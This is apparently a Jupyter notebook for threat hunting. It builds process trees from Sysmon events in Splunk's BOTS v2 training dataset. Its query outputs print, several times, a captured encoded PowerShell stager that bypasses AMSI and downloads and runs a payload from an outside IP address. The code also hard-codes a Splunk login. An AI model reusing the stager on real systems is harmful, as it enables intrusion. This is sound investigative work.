# Introduction

This notebook contains code for creating basic ascii process trees based on sysmon log found in splunk. I found it much easier to investigate the data when it was arranged in a process tree. At the bottom there are a couple of examples illustrating how it can be used

# Notebooks setup

In [1]:
from intake_splunk.core import SplunkConnect
from treelib import Tree,Node
import pandas as pd
import numpy as np

pd.set_option('display.max_rows', 1000)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
pd.set_option('display.max_colwidth', 0)

In [2]:
s=SplunkConnect("https://localhost:8089")
s.auth("admin","superadmin")
SPL=s.read_pandas

# Proctree sourcecode

In [11]:
class EventNode(Node):
    def __init__(self, tag=None, identifier=None, expanded=True, data=None):
        if not identifier:
            identifier=data["_cd"]
        super().__init__(tag, identifier, expanded, data)
        
class ProcessNode(EventNode):                
    @property
    def tag(self):
        return "{_time} Create Process {CommandLine} ({User})".format(**self.data)
    
class ComputerNode(Node):
    pass

class RemoteThreadNode(EventNode):                
    @property
    def tag(self):
        return "{_time}: Create Remote Thread {SourceImage} -> {TargetImage} {TargetProcessGuid}".format(**self.data)


class DriverLoadNode(EventNode):
    @property
    def tag(self):
        return "{_time} {EventDescription}: {ImageLoaded} {Hashes}".fomrat(**self.data)

class FileCreateNode(EventNode):
    @property
    def tag(self):
        return "{_time} {EventDescription}: {TargetFilename}".format(**self.data)

class RegistryNode(EventNode):
    @property
    def tag(self):
        return "{_time} {EventDescription}: {object_path} -> {registry_value_name}".format(**self.data)

    
class NetworkNode(EventNode):
    @property
    def tag(self):
        return "{_time} {EventDescription}: {DestinationHostname} ({DestinationIp} {dest_port} Num:{num} Last:{last})".format(**self.data)
    
    
class ProcTree:
    def __init__(self,prefix="index=botsv2 sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational",maxresult=5000):
        self.queries=[]
        self.tree=Tree()
        self.tree.create_node("query","query")
        self.df=pd.DataFrame()
        self.maxresult=maxresult
        
        self.prefix=prefix
        self.suffix="""| table _time, Computer, process_guid,parent_process_guid, process_image, 
   ParentCommandLine,CommandLine, EventDescription,User,DestinationHostname, 
   DestinationIp,dest_port, TargetFilename,ImageLoaded,Hashes,object_path,registry_value_name,
   SourceImage,TargetImage,SourceProcessGuid,TargetProcessGuid,_cd"""  
    
        
    def _run_query(self,query):
        self.queries.append(query)        
        q=self.prefix + " " + query + " " + self.suffix + f" | head {self.maxresult} "
        df=SPL(q)
        if len(df)== self.maxresult:
            print (f"WARNING: Results caped at {self.maxresult}")
        return df
        
    def query(self,query):        
        df=self._run_query(query)
        self.df=self.df.append(df).drop_duplicates()    
        self.build_tree(df)    
        return self
    
    def show(self): 
        self.tree.show()
        
    def _childprocsquery(self):
        return " OR ".join(f"parent_process_guid={p}" for p in self.df[self.df.process_guid.notnull()].process_guid)
        
    def addchildprocs(self,maxdepth=5):
        for i in range(maxdepth):
            q=self._childprocsquery()
            before=len(self.df)
            self.query(q)
            after=len(self.df)
            
            if after-before==0:
                print(f"Stopping after {i+1} iterations because no more data was found")
                return self
        print (f"WARNING: Stopping after {maxdepth} iterations without reaching all child procs")
        return self
    
    def _parentprocsquery(self):
        return " OR ".join(f"process_guid={p}" for p in self.df[self.df.parent_process_guid.notnull()].parent_process_guid)
    
    def addparentprocs(self,maxdepth=5):
        for i in range(maxdepth):
            q=self._parentprocsquery()
            before=len(self.df)
            self.query(q)
            after=len(self.df)
            
            if after-before==0:
                print(f"Stopping after {i+1} iterations")
                return self
        print (f"WARNING: Stopping after {maxdepth} iterations without reaching all parent procs")
        return self
    
    def _relatedprocssquery(self):
        parentproc=self.df[self.df.parent_process_guid.notnull()].parent_process_guid
        proc=self.df[self.df.process_guid.notnull()].process_guid 
        allguids=proc.append(parentproc).drop_duplicates()
        return " OR ".join(f"{p}" for p in allguids) 
    
    def addrelatedprocs(self,maxdepth=5):
        for i in range(maxdepth):
            q=self._relatedprocssquery()
            before=len(self.df)
            self.query(q)
            after=len(self.df)

            if after-before==0:
                print(f"Stopping after {i+1} iterations")
                return self
            
        print (f"WARNING: Stopping after {maxdepth} iterations without reaching all parent procs")
        return self
        
    def build_tree(self,df):
        t=self.tree
        for index,p in df.iterrows():        
            computer=t.get_node(p.Computer)        
            if not computer:
                computer=ComputerNode(identifier=p.Computer)
                t.add_node(computer,"query")      


            if p.EventDescription=="Process Create":            
                #Here we have to deal with potentially missing parent processes. The query might not include the creation of the parent process
                parent=t.get_node(p.parent_process_guid)
                if not parent:                
                    parent=ProcessNode(identifier=p.parent_process_guid,data={"CommandLine":p.ParentCommandLine,"_time":p._time,"User":p.User,"_cd":p._cd})
                    t.add_node(parent,computer)


                #Here we have to deal with potentially already existing process. If a child process was process first for some reason that will add the parent as well. This can also happen with multple overlapping queries.
                process=t.get_node(p.process_guid)
                if process:
                    t.move_node(p.process_guid,p.parent_process_guid)
                    process.data=p.to_dict()
                #Normal case, Add process to tree
                else:
                    child=ProcessNode(identifier=p.process_guid,data=p.to_dict())
                    t.add_node(child,parent)

            if p.EventDescription=="Process Terminate":
                process=t.get_node(p.process_guid)
                if process:
                    process.data["time_terminate"]=p._time
                else:
                    #Ignore terminating process that we have no other data on
                    pass


            #If node is already in tree continue. This can happen if there are multiple overlapping queries to build the tree
            if t.contains(p._cd):
                continue

            if p.EventDescription=="Create Remote Thread":
                #Here we have to deal with potentially missing source process
                sourceProcess=t.get_node(p.SourceProcessGuid)
                if not sourceProcess:
                    sourceProcess=ProcessNode(identifier=p.SourceProcessGuid,data={"CommandLine":"","_time":p._time,"User":p.User,"_cd":p._cd})
                    t.add_node(sourceProcess,computer)

                #Add identifier
                node=RemoteThreadNode(data=p.to_dict())
                t.add_node(node,p.SourceProcessGuid)


            
            #Here we deal with the case if process is not existing for all the other events. For example a "Driver Load" event can referanse a process that is not part of the query. We then add the process to the tree witht the info we have
            proc=t.get_node(p.process_guid)
            if not proc:
                proc=ProcessNode(identifier=p.process_guid,data={"CommandLine":p.ParentCommandLine,"_time":p._time + "??","User":p.User,"_cd":p._cd})
                t.add_node(proc,computer)

            #Driver load
            if p.EventDescription=="Driver Load":
                node=DriverLoadNode(data=p.to_dict())
                t.add_node(node,p.process_guid)     

            #File Create Time and File Create
            if p.EventDescription.startswith("File Create"): 
                node=FileCreateNode(data=p.to_dict())
                t.add_node(node,p.process_guid)     

            #Registry value set and Registry object added or deleted
            if p.EventDescription.startswith("Registry"): 
                node=RegistryNode(data=p.to_dict())
                t.add_node(node,p.process_guid)  

            #Network
            if p.EventDescription.startswith("Network"):
                identifier=f"{p.Computer} {p.DestinationHostname} {p.DestinationIp} {p.dest_port}"
                node=t.get_node(identifier)
                if node:
                    #TODO: Should compare before overwrite to make sure p._time is the largest
                    node.data["last"]=p._time
                    node.data["num"]+=1
                else:
                    data=p.to_dict()
                    data["last"]=p._time
                    data["num"]=1
                    node=NetworkNode(identifier=identifier,data=data,expanded=False)
                    t.add_node(node,p.process_guid)
                
                subNode=Node(tag=f"{p._time}",identifier=p._cd)
                t.add_node(subNode,node)
        return t

# Examples 1 eventwr.exe
This examples is based on a inital splunk search after "eventvwr.exe". We can se from the first table that there is something strange going one


In [4]:
SPL("index=botsv2 sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational eventvwr.exe NOT *splunk* | table _time,CommandLine,ParentCommandLine")

,_time,CommandLine,ParentCommandLine
0,2017-08-24T03:32:00.000+00:00,"""C:\Windows\system32\eventvwr.exe""",powershell -noP -sta -w 1 -enc WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAFQARQBNAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAYwBUADEAMAAwAEMATwBOAHQAaQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBsAGkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQAVwBjAC4ASABlAEEARABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUABSAE8AWAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAUgBlAHEAdQBlAFMAVABdADoAOgBEAGUAZgBBAFUAbAB0AFcAZQBiAFAAcgBPAHgAeQA7ACQAVwBDAC4AUABSAG8AeAB5AC4AQwBSAEUARABlAE4AdABJAEEAbABzACAAPQAgAFsAUwB5AFMAdABlAE0ALgBOAEUAVAAuAEMAUgBlAGQARQBOAHQAaQBBAGwAQwBBAEMAaABFAF0AOgA6AEQAZQBGAEEAdQBsAFQATgBFAFQAVwBvAFIAawBDAHIAZQBEAEUATgBUAEkAYQBsAFMAOwAkAEsAPQBbAFMAeQBzAFQAZQBtAC4AVABFAHgAdAAuAEUATgBjAE8AZABpAE4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAFkAVABlAHMAKAAnADMAOAA5ADIAOAA4AGUAZABkADcAOABlADgAZQBhADIAZgA1ADQAOQA0ADYAZAAzADIAMAA5AGIAMQA2AGIAOAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAUwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMATwBVAE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAFgAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAFcAQwAuAEgAZQBhAEQAZQBSAFMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AGoAawBuAFgAcABvAGEANwBwAFUAQQAwAGwARABCACsAbgBZAGkAUQB2AFUAOQB1AG4ASABnAD0AIgApADsAJABzAGUAcgA9ACcAaAB0AHQAcABzADoALwAvADQANQAuADcANwAuADYANQAuADIAMQAxADoANAA0ADMAJwA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQARABBAFQAQQA9ACQAVwBDAC4ARABvAFcAbgBMAG8AQQBkAEQAYQBUAGEAKAAkAFMARQByACsAJAB0ACkAOwAkAEkAVgA9ACQARABBAFQAYQBbADAALgAuADMAXQA7ACQAZABBAFQAYQA9ACQARABhAFQAQQBbADQALgAuACQAZABhAFQAYQAuAEwAZQBOAEcAdABIAF0AOwAtAGoAbwBpAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
1,2017-08-24T03:32:00.000+00:00,NaN,NaN
2,2017-08-24T03:32:00.000+00:00,"""C:\Windows\system32\eventvwr.exe""",powershell -noP -sta -w 1 -enc WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAFQARQBNAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAYwBUADEAMAAwAEMATwBOAHQAaQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBsAGkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG

Display the same data in a processtree

In [5]:
tree=ProcTree("index=botsv2 sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational",maxresult=15000)
tree.query("eventvwr.exe NOT *splunk*") 
tree.show()

query
└── wrk-btun.frothly.local
    └── 2017-08-24T03:32:00.000+00:00 Create Process powershell -noP -sta -w 1 -enc  WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAFQARQBNAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAYwBUADEAMAAwAEMATwBOAHQAaQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBsAGkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQ

In [6]:
#The tree also retains the search results in a Dataframe
tree.df

,_time,Computer,process_guid,parent_process_guid,process_image,ParentCommandLine,CommandLine,EventDescription,User,DestinationHostname,DestinationIp,dest_port,TargetFilename,ImageLoaded,Hashes,object_path,registry_value_name,SourceImage,TargetImage,SourceProcessGuid,TargetProcessGuid,_cd
0,2017-08-24T03:32:00.000+00:00,wrk-btun.frothly.local,{B2E0DF5E-9188-598C-0000-00101A359A01},{B2E0DF5E-90DC-598C-0000-001026639601},NaN,powershell -noP -sta -w 1 -enc WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAFQARQBNAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAYwBUADEAMAAwAEMATwBOAHQAaQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBsAGkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQAVwBjAC4ASABlAEEARABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUABSAE8AWAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAUgBlAHEAdQBlAFMAVABdADoAOgBEAGUAZgBBAFUAbAB0AFcAZQBiAFAAcgBPAHgAeQA7ACQAVwBDAC4AUABSAG8AeAB5AC4AQwBSAEUARABlAE4AdABJAEEAbABzACAAPQAgAFsAUwB5AFMAdABlAE0ALgBOAEUAVAAuAEMAUgBlAGQARQBOAHQAaQBBAGwAQwBBAEMAaABFAF0AOgA6AEQAZQBGAEEAdQBsAFQATgBFAFQAVwBvAFIAawBDAHIAZQBEAEUATgBUAEkAYQBsAFMAOwAkAEsAPQBbAFMAeQBzAFQAZQBtAC4AVABFAHgAdAAuAEUATgBjAE8AZABpAE4ARwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAFkAVABlAHMAKAAnADMAOAA5ADIAOAA4AGUAZABkADcAOABlADgAZQBhADIAZgA1ADQAOQA0ADYAZAAzADIAMAA5AGIAMQA2AGIAOAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAUwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMATwBVAE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAFgAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAFcAQwAuAEgAZQBhAEQAZQBSAFMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AGoAawBuAFgAcABvAGEANwBwAFUAQQAwAGwARABCACsAbgBZAGkAUQB2AFUAOQB1AG4ASABnAD0AIgApADsAJABzAGUAcgA9ACcAaAB0AHQAcABzADoALwAvADQANQAuADcANwAuADYANQAuADIAMQAxADoANAA0ADMAJwA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQARABBAFQAQQA9ACQAVwBDAC4ARABvAFcAbgBMAG8AQQBkAEQAYQBUAGEAKAAkAFMARQByACsAJAB0ACkAOwAkAEkAVgA9ACQARABBAFQAYQBbADAALgAuADMAXQA7ACQAZABBAFQAYQA9ACQARABhAFQAQQBbADQALgAuACQAZABhAFQAYQAuAEwAZQBOAEcAdABIAF0AOwAtAGoAbwBpAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA,"""C:\Windows\system32\eventvwr.exe""",Process Create,FROTHLY\billy.tun,NaN,NaN,NaN,NaN,NaN,SHA1=7DA783898D04E96876C6067819511925DC1BC0B9,NaN,NaN,NaN,NaN,NaN,NaN,55:8518179
1,2017-08-24T03:32:00.000+00:00,wrk-btun.frothly.local,{B2E0DF5E-9188-598C-0000-0010181C9A01},NaN,NaN,NaN,NaN,Process Terminate,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,55:8517977
2,2017-08-24T03:32:00.000+00:00,wrk-btun.frothly.local,{B2E0DF5E-9188-598C-0000-0010181C9A01},{B2E0DF5E-90DC-598C-0000-001026639601},NaN,powershell -noP -sta -w 1 -enc WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQ

The tree has a function for adding parent processes. I have not found an easy way to do recursive self join in splunk. This is therefor implementet as multiple splunk searches. There is a default limit on 5 iterations. You will also get a worning if the limit is reached before all parent processes are found


In [7]:
tree.addparentprocs()  
tree.show()

Stopping after 2 iterations
query
└── wrk-btun.frothly.local
    └── 2017-08-24T03:29:08.000+00:00 Create Process C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding (FROTHLY\billy.tun)
        └── 2017-08-24T03:29:08.000+00:00 Create Process powershell -noP -sta -w 1 -enc  WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAFQARQBNAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAYwBUADEAMAAwAEMATwBOAHQAaQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBsAGkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8

In [8]:
#The tree has a function for adding child process
tree.addchildprocs()
tree.show()

Stopping after 4 iterations because no more data was found
query
└── wrk-btun.frothly.local
    └── 2017-08-24T03:29:08.000+00:00 Create Process C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding (FROTHLY\billy.tun)
        └── 2017-08-24T03:29:08.000+00:00 Create Process powershell -noP -sta -w 1 -enc  WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAFQARQBNAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAYwBUADEAMAAwAEMATwBOAHQAaQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBsAGkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcA

The functions can be chained and there is a "addrelatedprocs" function that basically combines addparent and addchild


In [9]:
ProcTree("index=botsv2 sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational",maxresult=15000).query("eventvwr.exe NOT *splunk*").addrelatedprocs().show()

Stopping after 5 iterations
query
└── wrk-btun.frothly.local
    └── 2017-08-24T03:29:08.000+00:00 Create Process C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding (FROTHLY\billy.tun)
        └── 2017-08-24T03:29:08.000+00:00 Create Process powershell -noP -sta -w 1 -enc  WwBSAEUARgBdAC4AQQBTAFMARQBtAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkARQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAHUAZQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApAH0AOwBbAFMAWQBzAFQARQBNAC4ATgBlAHQALgBTAGUAcgBWAEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAWABQAEUAYwBUADEAMAAwAEMATwBOAHQAaQBuAHUAZQA9ADAAOwAkAHcAQwA9AE4ARQB3AC0ATwBCAGoARQBDAFQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBsAGkARQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8

# Example 2 powershell

This search finds and  displays suspicious powershell usage in the data botsv2 dataset. We are lucky that there is very little normal powershell usage in the dataset

This example also illustrates the maxresult and maxdepth parameters that need to be changed to get the complete result.


In [10]:
ProcTree("index=botsv2 sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational",maxresult=15000).query("powershell NOT *splunk*").addrelatedprocs(maxdepth=10).show()

Stopping after 6 iterations
query
├── venus.frothly.local
│   ├── 2017-08-24T03:55:14.000+00:00 Create Process C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding (FROTHLY\service3)
